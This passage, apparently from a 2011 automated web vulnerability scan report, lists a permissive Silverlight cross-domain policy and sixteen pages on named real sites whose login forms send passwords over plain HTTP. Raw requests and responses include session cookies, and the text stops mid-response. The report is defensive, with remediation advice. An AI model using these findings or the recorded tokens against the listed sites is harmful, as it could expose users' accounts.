Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: onlinehelp.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 20:27:16 GMT
Accept-Ranges: bytes
ETag: "d0c5772cd0fecb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAADRCAAAouf8EndFzMVQgCKW4M+iDQ!!&M=1; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:13 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:23:12 GMT
Connection: keep-alive
Content-Length: 1435

...<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msdn.microsoft.com"/>
<domain uri="http://i.msdn.microsoft.com"/>
<domain uri="http://i2.msdn.microsoft.com"/>
<domain uri="http://i3.msdn.microsoft.com"/>

<domain uri="http://technet.microsoft.com"/>
<domain uri="http://i.technet.microsoft.com"/>
<domain uri="http://i2.technet.microsoft.com"/>
<domain uri="http://i3.technet.microsoft.com"/>

<domain uri="http://expression.microsoft.com"/>
<domain uri="http://i.expression.microsoft.com"/>
<domain uri="http://i2.expression.microsoft.com"/>
<domain uri="http://i3.expression.microsoft.com"/>
...[SNIP]...
<domain uri="http://i.onlinehelp.microsoft.com"/>
<domain uri="http://i2.onlinehelp.microsoft.com"/>
<domain uri="http://i3.onlinehelp.microsoft.com"/>

<domain uri="http://help.outlook.com"/>
<domain uri="http://i.help.outlook.com"/>
<domain uri="http://i2.help.outlook.com"/>
<domain uri="http://i3.help.outlook.com"/>
...[SNIP]...

8. Cleartext submission of password  previous  next
There are 17 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://dl.scriptlogic.com/login/Combined.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/Combined.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /login/Combined.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/050709; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
<body>
<form name="LoginForm" method="post" action="Combined.aspx?pid=108&amp;r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$tbCreatePassword" type="password" size="30" id="ctl00_ContentPlaceHolder1_tbCreatePassword" /></td>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$tbCreatePasswordConf" type="password" size="30" id="ctl00_ContentPlaceHolder1_tbCreatePasswordConf" /></td>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$tbPassword" type="password" size="30" id="ctl00_ContentPlaceHolder1_tbPassword" onkeydown="fnTrapKD(ctl00_ContentPlaceHolder1_butLogin,event)" /></td>
...[SNIP]...

8.2. http://home.controlcase.com/piwik/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.controlcase.com
Path:   /piwik/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /piwik/ HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Set-Cookie: PIWIK_SESSID=7ef27p0ehe42dd0uvk2637blb6; path=/; HttpOnly
Expires:
Cache-Control: no-store, must-revalidate
Pragma:
X-Frame-Options: sameorigin
Content-Length: 2654
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head>
<title>Piwik &rsa
...[SNIP]...
<div id="login">
<form action="" name="loginform" id="loginform" method="post">
<p>
...[SNIP]...
<br />
<input type="password" name="form_password" id="form_password" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

8.3. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/BT-CO-20110428-705019.html/x22 HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa0f634f-2160-4807-9b6f-dd9894b18d38; domain=.wsj.com; path=/; Expires=Fri Apr 30 09:24:28 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Wed, 02-May-2012 13:24:28 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 05/02/11 - 00:46:42 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=36
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 82539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

8.4. http://truehits.net/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://truehits.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:46 GMT
Server: Apache
Content-Length: 52037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<td>
<form name="login" method="post" action="http://truehits.net/ch_pass.php">
<table width="130" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td style = "padding: 3px 3px 0px 3px">
<input name="passwd" type="password" class="inputtext" size="15" maxlength="20" />
</td>
...[SNIP]...

8.5. http://truehits.net/stat.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /stat.php HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:47 GMT
Server: Apache
Content-Length: 36450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<td>
<form name="login" method="post" action="http://truehits.net/ch_pass.php">
<table width="130" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td style = "padding: 3px 3px 0px 3px">
<input name="passwd" type="password" class="inputtext" size="15" maxlength="20" />
</td>
...[SNIP]...

8.6. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:08 GMT
X-Varnish: 1509835285 1507595749
Age: 23086
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 71881


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
</div>
       <form name="registerForm" id="registerForm" action="javascript:doregister();" method="post" accept-charset="utf-8">
               <input type=hidden name="wpCreateaccount" value="1">
...[SNIP]...
</label>
           <input type="password" name="wpPassword" value="" tabindex=2 id="password" /><br/>
...[SNIP]...
</label>
           <input type="password" name="wpRetype" value="" tabindex=3 id="password2" />
       </div>
...[SNIP]...

8.7. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:08 GMT
X-Varnish: 1509835285 1507595749
Age: 23086
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 71881


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
</div>
       <form name="loginform" action="javascript:dologin();" method="post" accept-charset="utf-8">
               <input type=hidden name="isBasic" value="1">
...[SNIP]...
</label>
           <input type="password" tabindex=2 name="wpPassword" value="" id="password" /><br/>
...[SNIP]...

8.8. http://wikipediareview.com/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikipediareview.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.php?showtopic\\x3d32014\\x22 HTTP/1.1
Host: wikipediareview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: 0session_id=11c93e765b7f96723766ab11a49d89be; path=/; domain=.wikipediareview.com
Connection: close
Content-Type: text/html
Content-Length: 68471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
<form action="http://wikipediareview.com/index.php?s=11c93e765b7f96723766ab11a49d89be&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="this.value=''" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="this.value=''" value="ibfrules" />
               <input class="button" type="image" src="stimg9x0b4fsr2/brack/login-button.gif" />
...[SNIP]...

8.9. http://www.controlcase.com/change_password.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.controlcase.com
Path:   /change_password.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /change_password.php HTTP/1.1
Host: www.controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/logon_page.php
Cookie: __utma=208121856.1545234492.1303665078.1303665078.1304448138.2; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=244604216c6eb329.1304448138.1.1304448224.1304448138; _pk_ses.3.456c=*; __utmb=208121856.5.10.1304448138; __utmc=208121856; PHPSESSID=22b25ef82ae4b97a809b48be70fe26dc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:39 GMT
Server: Apache/2.0.55 (Win32)
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form name="change_passwd" method='post' action='change_password.php' onSubmit="javascript:document.change_passwd.todo.value='change'">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...
<td><input name="new_password" type="password" id="PW__pass_new" size="50" /></td>
...[SNIP]...
<td><input name="confirm_password" type="password" id="PW__pass_confirm" size="50" /></td>
...[SNIP]...

8.10. http://www.controlcase.com/logon_page.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.controlcase.com
Path:   /logon_page.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /logon_page.php HTTP/1.1
Host: www.controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/logon_page.php
Cookie: __utma=208121856.1545234492.1303665078.1303665078.1304448138.2; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=244604216c6eb329.1304448138.1.1304448228.1304448138; _pk_ses.3.456c=*; __utmb=208121856.6.10.1304448138; __utmc=208121856; PHPSESSID=22b25ef82ae4b97a809b48be70fe26dc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:55 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form method='post' action='process_form_PW.php' name="login_frm">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...

8.11. http://www.khonkaen.com/english/forum/default.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.khonkaen.com
Path:   /english/forum/default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /english/forum/default.asp HTTP/1.1
Host: www.khonkaen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 56230
Content-Type: text/html
Expires: Sun, 01 May 2011 13:35:08 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D05%2D03+09%3A35%3A08; expires=Thu, 03-May-2012 13:35:08 GMT; path=/english/forum/
Set-Cookie: WWF9sID=SID=f164d34f8z5551bee8bz1c9f5zddd61d; path=/english/forum/
Set-Cookie: ASPSESSIONIDAADRARSA=HLEDHHGDIEGBPGHDMNPDLMJJ; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" tabindex="1" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" tabindex="2" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

8.12. http://www.newsroom.barclays.com/webuser/newsextra.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /webuser/newsextra.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /webuser/newsextra.aspx HTTP/1.1
Host: www.newsroom.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2wxxy2n3jbvq02h4rhinjrs4; __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454139565:ss=1304454046661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:50 GMT
Content-Length: 68261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<body>
   <form name="aspnetForm" method="post" action="newsextra.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" cssclass="globalForm">
<div>
...[SNIP]...
<div class="newsExtraInput" >
            <input name="ctl00$body$ctl00$loginControl$txtPasswordNewsExtra" type="password" id="ctl00_body_ctl00_loginControl_txtPasswordNewsExtra" tabindex="2" class="password loginfields" onblur="TextInsideOnBlur(this,&#39;Password&#39;)" onfocus="TextInsideOnFocus(this, &#39;Password&#39;)" /><span id="ctl00_body_ctl00_loginControl_rfvPassword" style="color:Red;display:none;">
...[SNIP]...

8.13. http://www.newsroom.barclays.com/webuser/register.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /webuser/register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /webuser/register.aspx HTTP/1.1
Host: www.newsroom.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2wxxy2n3jbvq02h4rhinjrs4; __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454139565:ss=1304454046661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:46 GMT
Content-Length: 127697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<body>
   <form name="aspnetForm" method="post" action="register.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" cssclass="globalForm">
<div>
...[SNIP]...
<div class="newsExtraInput">
               <input name="ctl00$body$ctl00$txtPassword" type="password" maxlength="20" id="ctl00_body_ctl00_txtPassword" size="20" /><span id="ctl00_body_ctl00_RequiredFieldValidator1" title="Please enter a value for Password: (over 6 characters)" style="color:Red;visibility:hidden;">
...[SNIP]...

8.14. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
<td class="windowbg2" valign="middle">
                       <form action="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login2" method="post" accept-charset="TIS-620" style="margin: 0;">
                           <table border="0" cellpadding="2" cellspacing="0" align="center" width="100%">
...[SNIP]...
<br />
                                   <input type="password" name="passwrd" id="passwrd" size="15" /></label>
...[SNIP]...

8.15. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
</script>

                               <form action="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login2" method="post" accept-charset="TIS-620" class="middletext" style="margin: 3px 1ex 1px 0;" onsubmit="hashLoginPassword(this, 'f659db5a40e8c19cc022cfaaaa4c80b7');">
                                   <input type="text" name="user" size="10" /> <input type="password" name="passwrd" size="10" />
                                   <select name="cookielength">
...[SNIP]...

8.16. http://www.yestheyrefake.net/vb/forumdisplay.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yestheyrefake.net
Path:   /vb/forumdisplay.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /vb/forumdisplay.php HTTP/1.1
Host: www.yestheyrefake.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:34 GMT
Server: Apache
Cache-Control: private
Pragma: private
X-Powered-By: PHP/4.4.9
X-UA-Compatible: IE=7
